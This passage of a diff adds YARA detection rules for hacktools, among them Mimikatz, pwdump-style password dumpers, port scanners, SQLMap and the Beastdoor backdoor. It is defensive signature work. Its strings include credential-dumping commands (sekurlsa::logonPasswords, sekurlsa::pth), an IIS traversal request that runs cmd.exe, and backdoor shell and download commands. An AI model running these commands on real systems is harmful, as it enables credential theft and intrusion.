+		$g = "samdump.dll"
+		$h = "WPEPRO SEND PACKET"
+		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
+		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
+		$k = "arpspoof\\Debug"
+		$l = "Success: The log has been cleared"
+		$m = "clearlogs [\\\\computername"
+		$n = "DumpUsers 1."
+		$o = "dictionary attack with specified dictionary file"
+		$p = "by Objectif Securite"
+		$q = "objectif-securite"
+		$r = "Cannot query LSA Secret on remote host"
+		$s = "Cannot write to process memory on remote host"
+		$t = "Cannot start PWDumpX service on host"
+		$u = "usage: %s <system hive> <security hive>"
+		$v = "username:domainname:LMhash:NThash"
+		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
+		$x = "Impersonation Tokens Available"
+		$y = "failed to parse pwdump format string"
+		$z = "Dumping password"
+	condition: 
+		1 of them
+}
+
+rule HackTool_Producers {
+	meta: description = "Hacktool Producers String" threat_level = 5 score = 50
+	strings:
+	$a1 = "www.oxid.it"
+	$a2 = "www.analogx.com"
+	$a3 = "ntsecurity.nu"
+	$a4 = "gentilkiwi.com"
+	$a6 = "Marcus Murray"
+	$extension = /extension: \.(ini|xml)\n/
+	condition: 1 of ($a*) and not $extension
+}
+
+/* Mimikatz */
+
+rule Mimikatz_Memory_Rule_1 : APT {
+	meta: 
+		author = "Florian Roth"
+		date = "12/22/2014"
+		score = 70
+		type = "memory"
+		description = "Detects password dumper mimikatz in memory"
+	strings:
+		$s1 = "sekurlsa::msv" fullword ascii
+	    $s2 = "sekurlsa::wdigest" fullword ascii
+	    $s4 = "sekurlsa::kerberos" fullword ascii
+	    $s5 = "sekurlsa::tspkg" fullword ascii
+	    $s6 = "sekurlsa::livessp" fullword ascii
+	    $s7 = "sekurlsa::ssp" fullword ascii
+	    $s8 = "sekurlsa::logonPasswords" fullword ascii
+	    $s9 = "sekurlsa::process" fullword ascii
+	    $s10 = "ekurlsa::minidump" fullword ascii
+	    $s11 = "sekurlsa::pth" fullword ascii
+	    $s12 = "sekurlsa::tickets" fullword ascii
+	    $s13 = "sekurlsa::ekeys" fullword ascii
+	    $s14 = "sekurlsa::dpapi" fullword ascii
+	    $s15 = "sekurlsa::credman" fullword ascii
+	condition:
+		1 of them
+}
+
+rule Mimikatz_Memory_Rule_2 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a memory dump"
+		author = "Florian Roth - Florian Roth"
+		type = "memory"
+		score = 80
+	strings:
+		$s0 = "sekurlsa::" ascii
+		$x1 = "cryptprimitives.pdb" ascii
+		$x2 = "Now is t1O" ascii fullword
+		$x4 = "ALICE123" ascii
+		$x5 = "BOBBY456" ascii
+	condition:
+		$s0 and 1 of ($x*)
+}
+
+rule Mimikatz_SampleSet_1 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash1 = "9ef9762169e8b44d01613234927f44d6"
+		hash2 = "35b34bb9f1ad0fdf48dc090ed4a8190f"	
+		hash3 = "516fde1fe06f96a019c3ad063c78b760"
+		hash4 = "faf248ee5184b65d28786d91c02864a6"
+		hash5 = "5847659129c4e711809ab5b6ab1b8bd8"
+		score = 80
+	strings:
+		$s0 = "mimikatz_trunk/Win32/mimidrv.sys" fullword
+		$s1 = "Mimikatz 2.0\\x64\\mimidrv.sys" fullword
+		$s2 = "32\\kelloworld.dll"
+		$s3 = "64\\kelloworld.dll"
+		$s4 = "32/kelloworld.dll"
+		$s5 = "64/kelloworld.dll"
+		$s6 = "mimidrv.sys" fullword
+		$s7 = "sekurlsa.lib" fullword
+		$s8 = "mimilib.dll" fullword
+		$s9 = "mimikatz.exe" fullword
+	condition:
+		3 of them
+}
+rule Mimikatz_SampleSet_2 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash = "6f14b6744aad66ac017ab7733cdb51ad"
+		score = 50
+	strings:
+		$s0 = "notsupported" fullword
+		$s1 = "getKerberos" fullword
+		$s2 = "M(knN0123456789abcdefghijklmnopqrstuvwxyz" fullword
+		$s3 = "getLiveSSPFunctions" fullword
+		$s4 = "getKerberosFunctions" fullword
+		$s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+		$s6 = ".?AV_System_error@std@@" fullword
+		$s7 = "getCredmanFunctions" fullword
+		$s8 = "find_tokens" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_3 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash = "f62848e3cd2f0316608c2696c6504b4a"
+		score = 50
+	strings:
+		$s8 = "x64/intra.kirbi" fullword
+		$s9 = "x64/intra.kirbi*kb" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_4 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash1 = "8991aeef8b33049c5997c59afcea4a27"
+		hash2 = "a3e00b039f2d2ea04a4274506dd83be0"
+		hash3 = "cb5d40cc8db79c3d24f20f443f7e5926"
+		score = 40
+	strings:
+		$s0 = "notsupported" fullword
+		$s1 = "getLiveSSP" fullword
+		$s2 = "getKerberos" fullword
+		$s3 = "getLiveSSPFunctions" fullword
+		$s4 = "getKerberosFunctions" fullword
+		$s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+		$s6 = "getCredmanFunctions" fullword
+		$s7 = "getCredman" fullword
+		$s8 = "find_tokens" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_5 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash1 = "9ca015f05cc4cbae8d50bcd067e6d605"
+		score = 50
+	strings:
+		$s6 = "mimidrv.sys" fullword
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_6 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash = "739c80bac405eb1b0ebbe10a75515ff1"
+	strings:
+		$s1 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+		$s2 = "Erreur : impossible d'ouvrir le bureau cible (" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_7 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "821e5dc1ad4bbad2958e036c84bf7734"
+		hash1 = "e39e57fb7ff38e7be1a8da785ef83557"
+		hash2 = "9ecb8020b0989778009d5aaf13640ea4"
+		hash3 = "4bfe2b27a63678fa6b4bd27c8d309508"
+		hash4 = "fb164aadc2ae4a7aa3fc3f54cd8fa92a"
+		hash5 = "33786d2823e6d5e75b1a3a8bb2837b40"
+		hash6 = "a4c1feb5f3f5a71320aeca588cb1f14c"
+		hash7 = "36fc962a871cfb9f7d31dc9faaab5b54"
+		hash8 = "35bc4af0cbaa48e8a72884e3e690fc3b"
+		hash9 = "f1de7a81394efe6cc9438033a75cae0d"
+		hash10 = "a6e0cf20f2de5149885297188644f123"
+		hash11 = "bb7d4174e9ffae01a14993c528de8653"
+		hash12 = "ffd3df1ee7bfd6f1255221c3f82478f1"
+		hash13 = "eaf8dfbe80c42dd92740a9e71ea444ab"
+		hash14 = "e25b75621c03da7addc55dac378d77c4"
+		hash15 = "41ea9b05bcfceca78d51f776bfdee393"
+		hash16 = "a03a4272be8a2ee5e48ba2c417ff3b5b"
+		hash17 = "96501f7e9dc19a4012b1f5db1dce7018"
+		hash18 = "b6fe1b2e961c294155d8f48b6c57f28f"
+		hash19 = "1680c6afebcb77a21b6619aedc304931"
+		hash20 = "46820c90b2fb296e26b4bb8f7cad51ac"
+		hash21 = "a21634571795601f5eace5d503246b3b"
+		hash22 = "e6dda29f842ce3b7c72b5536fab4f860"
+		hash23 = "006480db3303a7ba9d73e32bc6c0bc11"
+		hash24 = "efa68dd73410c4be6f6b0a95a02762f2"
+		hash25 = "7194944aa418851631d7e614ff430b0a"
+		hash26 = "3a98b9190bf6ed5f75d9c3950a63dd08"
+		hash27 = "02f7536279480b73c9942c072c1b5316"
+		hash28 = "8638370c805dc92581eba34fa57eb45e"
+		hash29 = "6f393ab258b87790a45d6d2b125bbc24"
+		hash30 = "dbb01a015ab11266bae5d6381ffd41c2"
+		score = 80
+	strings:
+		$s0 = "#         * Kernel mode *         #" fullword
+		$s1 = "kerberos!KerbGlobalLogonSessionTable" fullword
+		$s2 = "Authentication Id : %u ; %u (%08x:%08x)" fullword
+		$s3 = "%p - lsasrv!InitializationVector" fullword
+		$s4 = "%p - lsasrv!LogonSessionListCount" fullword
+		$s7 = "#          * User mode *          #" fullword
+		$s8 = "##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )"
+		$s9 = "livessp!LiveGlobalLogonSessionList" fullword
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_8 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "0a10fe0a341ac0b24347f183c83123cc"
+		hash1 = "d7e16bc11cdfc0f781e87f5df4ae24a5"
+		hash2 = "abdb41e32c447e703b03c9e307565ed3"
+		score = 40
+	strings:
+		$s0 = "?!?(?0?8?@?H?P?X?`?n?w?" fullword
+		$s1 = "2\"2'2.24292@2F2K2R2X2]2d2j2o2v2|2" fullword
+		$s2 = "7!7<7C7P7V7^7d7r7" fullword
+		$s3 = "0#0)0=0E0K0[0c0i0" fullword
+		$s4 = "878E8L8Y8`8f8l8r8" fullword
+		$s5 = ":*:/:7:=:B:I:O:T:[:a:f:m:s:x:" fullword
+		$s6 = "<'<4<9<D<K<Q<X<e<j<u<{<" fullword
+		$s7 = "8&878?8M8R8]8d8q8~8" fullword
+		$s8 = ";,;2;A;F;L;_;d;k;q;" fullword
+		$s9 = "3%3+31373=3C3I3N3_3s3" fullword
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_9 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "6e2eda476c141c63ff62c92d8b52ff7e"
+		hash1 = "f42b75103230cab39e4c58d5b0dca2c4"
+		hash2 = "dc6f62e3a0b584cb134633a12fd7d7b8"
+		hash3 = "d5918d735a23f746f0e83f724c4f26e5"
+		hash4 = "e98b714ccd14e61f776cc55a602d2dd0"
+		hash5 = "09a6e5cc589a485d9ab4eda772b46f2a"
+		hash6 = "4a51faef37af8b70fc9cf7c64f030b25"
+		hash7 = "e52e30811287426d4eef089a65cc2acf"
+		hash8 = "cd1606a1800150a33dea71d3f3ee9aed"
+		hash9 = "510fe825464dca92aadcd3d8289405aa"
+		hash10 = "0be87e16eb598006358cdaa9dfcd5af5"
+		hash11 = "1f0ce022ee9fe8d92235809eda73ce38"
+		hash12 = "e172a38ade3aa0a2bc1bf9604a54a3b5"
+		hash13 = "de20bddb9c3b1b09d980db5bbb5b5789"
+		hash14 = "c77db1ddffc7e6edac60bb5ca9a6e863"
+		hash15 = "6d8008edd86c5ca1a112018852777b1e"
+		hash16 = "525d6ca1446b01f912303f04f0c713ab"
+		score = 70
+	strings:
+		$s6 = "\\i386\\mimidrv.pdb"
+	condition:
+		all of them
+}
+rule Mimikatz_SampleSet_10 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		super_rule = 1
+		hash0 = "5522fd8fe2e205b30f9e74a94da0352d"
+		hash1 = "ec428ed7d1cc4ba3023696ddc138a376"
+		hash2 = "13e88493f844a0df3352cd721bfa41a6"
+		hash3 = "483e5365e1f1d83c2dcd4bdb398e779f"
+		hash4 = "04d04a1f0ff9e2ff1d35b8c2950cce53"
+		hash5 = "97cbbd6c4153ae4a410439e2c02d77ce"
+		hash6 = "b43dfc8be8db7eacfc993e323229fb9f"
+		hash7 = "72e95180a2e4ab59e1b7c10f1054740a"
+		hash8 = "eaaecd5bd100923c72d2b39d84dfd411"
+		hash9 = "a8ae792f0384fd3e7f411c826b48b7c8"
+		score = 40
+	strings:
+		$s0 = "D$hL9(t" fullword
+		$s1 = "l$LfD9o" fullword
+		$s2 = "AHH90t?L" fullword
+		$s3 = "M9Qpv\"I9Ips" fullword
+		$s4 = "tSD8T$<u" fullword
+		$s5 = ";f9T$Xw" fullword
+		$s6 = "6f9L$Xw" fullword
+		$s7 = "f;\\$@u1E3" fullword
+		$s8 = "8\\$8uFH" fullword
+		$s9 = "L$DfD;O" fullword
+	condition:
+		all of them
+}
+
+/* Removed Mimikatz samples set super rules 11 - 27 */
+
+/* Disclosed hack tool set */
+
+rule Fierce2
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the Fierce2 domain scanner"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
+	condition:
+		1 of them
+}
+
+rule Ncrack
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the Ncrack brute force tool"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
+	condition:
+		1 of them
+}
+
+rule SQLMap
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the SQLMap SQL injection tool"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "except SqlmapBaseException, ex:"
+	condition:
+		1 of them
+}
+
+rule PortScanner {
+	meta:
+		description = "Auto-generated rule on file PortScanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "b381b9212282c0c650cb4b0323436c63"
+	strings:
+		$s0 = "Scan Ports Every"
+		$s3 = "Scan All Possible Ports!"
+	condition:
+		all of them
+}
+
+rule DomainScanV1_0 {
+	meta:
+		description = "Auto-generated rule on file DomainScanV1_0.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
+	strings:
+		$s0 = "dIJMuX$aO-EV"
+		$s1 = "XELUxP\"-\\"
+		$s2 = "KaR\"U'}-M,."
+		$s3 = "V.)\\ZDxpLSav"
+		$s4 = "Decompress error"
+		$s5 = "Can't load library"
+		$s6 = "Can't load function"
+		$s7 = "com0tl32:.d"
+	condition:
+		all of them
+}
+
+rule MooreR_Port_Scanner {
+	meta:
+		description = "Auto-generated rule on file MooreR Port Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "376304acdd0b0251c8b19fea20bb6f5b"
+	strings:
+		$s0 = "Description|"
+		$s3 = "soft Visual Studio\\VB9yp"
+		$s4 = "adj_fptan?4"
+		$s7 = "DOWS\\SyMem32\\/o"
+	condition:
+		all of them
+}
+
+rule NetBIOS_Name_Scanner {
+	meta:
+		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
+	strings:
+		$s0 = "IconEx"
+		$s2 = "soft Visual Stu"
+		$s4 = "NBTScanner!y&"
+	condition:
+		all of them
+}
+
+rule FeliksPack3___Scanners_ipscan {
+	meta:
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
+	strings:
+		$s2 = "WCAP;}ECTED"
+		$s4 = "NotSupported"
+		$s6 = "SCAN.VERSION{_"
+	condition:
+		all of them
+}
+
+rule CGISscan_CGIScan {
+	meta:
+		description = "Auto-generated rule on file CGIScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "338820e4e8e7c943074d5a5bc832458a"
+	strings:
+		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
+		$s3 = "tcp is the only protocol supported thru socks server"
+		
+		$path1 = /filepath: .{,70}EPO.{,70}\n/
+	condition:
+		$s2 and $s3 and not $path1
+}
+
+rule IP_Stealing_Utilities {
+	meta:
+		description = "Auto-generated rule on file IP Stealing Utilities.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
+	strings:
+		$s0 = "DarkKnight"
+		$s9 = "IPStealerUtilities"
+	condition:
+		all of them
+}
+
+rule SuperScan4 {
+	meta:
+		description = "Auto-generated rule on file SuperScan4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "78f76428ede30e555044b83c47bc86f0"
+	strings:
+		$s2 = " td class=\"summO1\">"
+		$s6 = "REM'EBAqRISE"
+		$s7 = "CorExitProcess'msc#e"
+	condition:
+		all of them
+
+}
+rule PortRacer {
+	meta:
+		description = "Auto-generated rule on file PortRacer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "2834a872a0a8da5b1be5db65dfdef388"
+	strings:
+		$s0 = "Auto Scroll BOTH Text Boxes"
+		$s4 = "Start/Stop Portscanning"
+		$s6 = "Auto Save LogFile by pressing STOP"
+	condition:
+		all of them
+}
+
+rule scanarator {
+	meta:
+		description = "Auto-generated rule on file scanarator.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "848bd5a518e0b6c05bd29aceb8536c46"
+	strings:
+		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
+	condition:
+		all of them
+}
+
+rule aolipsniffer {
+	meta:
+		description = "Auto-generated rule on file aolipsniffer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "51565754ea43d2d57b712d9f0a3e62b8"
+	strings:
+		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
+		$s1 = "dwGetAddressForObject"
+		$s2 = "Color Transfer Settings"
+		$s3 = "FX Global Lighting Angle"
+		$s4 = "Version compatibility info"
+		$s5 = "New Windows Thumbnail"
+		$s6 = "Layer ID Generator Base"
+		$s7 = "Color Halftone Settings"
+		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
+	condition:
+		all of them
+}
+
+rule _Bitchin_Threads_ {
+	meta:
+		description = "Auto-generated rule on file =Bitchin Threads=.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
+	strings:
+		$s0 = "DarKPaiN"
+		$s1 = "=BITCHIN THREADS"
+	condition:
+		all of them
+}
+
+rule cgis4_cgis4 {
+	meta:
+		description = "Auto-generated rule on file cgis4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "d658dad1cd759d7f7d67da010e47ca23"
+	strings:
+		$s0 = ")PuMB_syJ"
+		$s1 = "&,fARW>yR"
+		$s2 = "m3hm3t_rullaz"
+		$s3 = "7Projectc1"
+		$s4 = "Ten-GGl\""
+		$s5 = "/Moziqlxa"
+	condition:
+		all of them
+}
+
+rule portscan {
+	meta:
+		description = "Auto-generated rule on file portscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "a8bfdb2a925e89a281956b1e3bb32348"
+	strings:
+		$s5 = "0    :SCAN BEGUN ON PORT:"
+		$s6 = "0    :PORTSCAN READY."
+	condition:
+		all of them
+}
+
+rule ProPort_zip_Folder_ProPort {
+	meta:
+		description = "Auto-generated rule on file ProPort.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
+	strings:
+		$s0 = "Corrupt Data!"
+		$s1 = "K4p~omkIz"
+		$s2 = "DllTrojanScan"
+		$s3 = "GetDllInfo"
+		$s4 = "Compressed by Petite (c)1999 Ian Luck."
+		$s5 = "GetFileCRC32"
+		$s6 = "GetTrojanNumber"
+		$s7 = "TFAKAbout"
+	condition:
+		all of them
+}
+
+rule StealthWasp_s_Basic_PortScanner_v1_2 {
+	meta:
+		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
+	strings:
+		$s1 = "Basic PortScanner"
+		$s6 = "Now scanning port:"
+	condition:
+		all of them
+}
+
+rule BluesPortScan {
+	meta:
+		description = "Auto-generated rule on file BluesPortScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "6292f5fc737511f91af5e35643fc9eef"
+	strings:
+		$s0 = "This program was made by Volker Voss"
+		$s1 = "JiBOo~SSB"
+	condition:
+		all of them
+}
+
+rule scanarator_iis {
+	meta:
+		description = "Auto-generated rule on file iis.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
+	strings:
+		$s0 = "example: iis 10.10.10.10"
+		$s1 = "send error"
+	condition:
+		all of them
+}
+
+rule stealth_Stealth {
+	meta:
+		description = "Auto-generated rule on file Stealth.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
+	strings:
+		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
+		$s6 = "This tool may be used only by system administrators. I am not responsible for "
+	condition:
+		all of them
+}
+
+rule Angry_IP_Scanner_v2_08_ipscan {
+	meta:
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "70cf2c09776a29c3e837cb79d291514a"
+	strings:
+		$s0 = "_H/EnumDisplay/"
+		$s5 = "ECTED.MSVCRT0x"
+		$s8 = "NotSupported7"
+	condition:
+		all of them
+}
+
+rule crack_Loader {
+	meta:
+		description = "Auto-generated rule on file Loader.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
+	strings:
+		$s0 = "NeoWait.exe"
+		$s1 = "RRRRRRRW"
+	condition:
+		all of them
+}
+
+rule CN_GUI_Scanner {
+	meta: 
+		description = "Detects an unknown GUI scanner tool - CN background"
+		author = "Florian Roth"
+		hash = "3c67bbb1911cdaef5e675c56145e1112"
+		score = 65
+		date = "04.10.2014"
+	strings:
+		$s1 = "good.txt" fullword ascii
+		$s2 = "IP.txt" fullword ascii
+		$s3 = "xiaoyuer" fullword ascii
+		$s0w = "ssh(" fullword wide
+		$s1w = ").exe" fullword wide
+	condition:
+		all of them
+}	
+
+rule CN_Packed_Scanner {
+	meta: 
+		description = "Suspiciously packed executable"
+		author = "Florian Roth"
+		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
+		score = 40
+		date = "06.10.2014"
+	strings:
+		$s1 = "kernel32.dll" fullword ascii
+		$s2 = "CRTDLL.DLL" fullword ascii
+		$s3 = "__GetMainArgs" fullword ascii
+		$s4 = "WS2_32.DLL" fullword ascii
+	condition:
+		all of them and filesize < 180KB and filesize > 70KB
+}
+
+rule Tiny_Network_Tool_Generic {
+	meta:
+		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
+		author = "Florian Roth"
+		date = "08.10.2014"
+		score = 40
+		type = "file"
+		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
+		hash1 = "cafc31d39c1e4721af3ba519759884b9"
+		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
+	strings:
+		$magic	= { 4d 5a }
+	
+		$s0 = "KERNEL32.DLL" fullword ascii
+		$s1 = "CRTDLL.DLL" fullword ascii
+		$s3 = "LoadLibraryA" fullword ascii
+		$s4 = "GetProcAddress" fullword ascii
+
+		$y1 = "WININET.DLL" fullword ascii
+		$y2 = "atoi" fullword ascii
+		
+		$x1 = "ADVAPI32.DLL" fullword ascii
+		$x2 = "USER32.DLL" fullword ascii
+		$x3 = "wsock32.dll" fullword ascii
+		$x4 = "FreeSid" fullword ascii
+		$x5 = "atoi" fullword ascii
+
+		$z1 = "ADVAPI32.DLL" fullword ascii
+		$z2 = "USER32.DLL" fullword ascii
+		$z3 = "FreeSid" fullword ascii
+		$z4 = "ToAscii" fullword ascii
+		
+	condition:
+		( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB
+}
+
+rule Beastdoor_Backdoor {
+	meta:
+		description = "Detects the backdoor Beastdoor"
+		author = "Florian Roth"
+		score = 55
+		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
+	strings:
+		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
+		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
+		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
+		$s7 = "Host: wwp.mirabilis.com:80" fullword
+		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
+		$s11 = "Shell                            -->Get A Shell" fullword
+		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
+		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
+	condition:
+		2 of them
+}
+
+rule Powershell_Netcat {
+	meta:
+		description = "Detects a Powershell version of the Netcat network hacking tool"
+		author = "Florian Roth"
+		score = 60
+		date = "10.10.2014"
+	strings:
+		$s0 = "[ValidateRange(1, 65535)]" fullword
+		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
+		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
+	condition:
+		all of them
+}
+
+rule Chinese_Hacktool_1014 {
+	meta:
+		description = "Detects a chinese hacktool with unknown use"
+		author = "Florian Roth"
+		score = 60
+		date = "10.10.2014"
+		hash = "98c07a62f7f0842bcdbf941170f34990"
+	strings:
+		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
+		$s1 = "msctls_progress32" fullword wide
+		$s2 = "Reply-To: %s" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "html htm htx asp" fullword ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_BAT_PortsOpen {
+	meta:
+		description = "Detects a chinese BAT hacktool for local port evaluation"
+		author = "Florian Roth"
+		score = 60
+		date = "12.10.2014"
+	strings:
+		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
+		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
+		$s2 = "@echo off" ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_SSPort_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named SSPort"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "Golden Fox" fullword wide
+		$s1 = "Syn Scan Port" fullword wide
+		$s2 = "CZ88.NET" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_ScanPort_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named ScanPort"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "LScanPort" fullword wide
+		$s1 = "LScanPort Microsoft" fullword wide
+		$s2 = "www.yupsoft.com" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_S_EXE_Portscanner {
+	meta:
+		description = "Detects a chinese Portscanner named s.exe"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "\\Result.txt" fullword ascii
+		$s1 = "By:ZT QQ:376789051" fullword ascii
+		$s2 = "(http://www.eyuyan.com)" fullword wide
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_MilkT_BAT {
+	meta:
+		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
+		author = "Florian Roth"
+		score = 70
+		date = "12.10.2014"
+	strings:
+		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
+		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_MilkT_Scanner {
+	meta:
+		description = "Detects a chinese Portscanner named MilkT"
+		author = "Florian Roth"
+		score = 60
+		date = "12.10.2014"
+	strings:
+		$s0 = "Bf **************" ascii fullword
+		$s1 = "forming Time: %d/" ascii
+		$s2 = "KERNEL32.DLL" ascii fullword
+		$s3 = "CRTDLL.DLL" ascii fullword
+		$s4 = "WS2_32.DLL" ascii fullword
+		$s5 = "GetProcAddress" ascii fullword
+		$s6 = "atoi" ascii fullword
+	condition:
+		all of them
+}
+
+rule CN_Hacktool_1433_Scanner {
+	meta:
+		description = "Detects a chinese MSSQL scanner"
+		author = "Florian Roth"
+		score = 40
+		date = "12.10.2014"
+	strings:
+		$magic = { 4d 5a }
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "del Weak1.txt" ascii fullword
+		$s3 = "del Attack.txt" ascii fullword
+		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii
+		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
+	condition:
+		( $magic at 0 ) and all of ($s*)
+}
+
+rule CN_Hacktool_1433_Scanner_Comp2 {
+	meta:
+		description = "Detects a chinese MSSQL scanner - component 2"
+		author = "Florian Roth"
+		score = 40
+		date = "12.10.2014"
+	strings:
+		$magic = { 4d 5a }
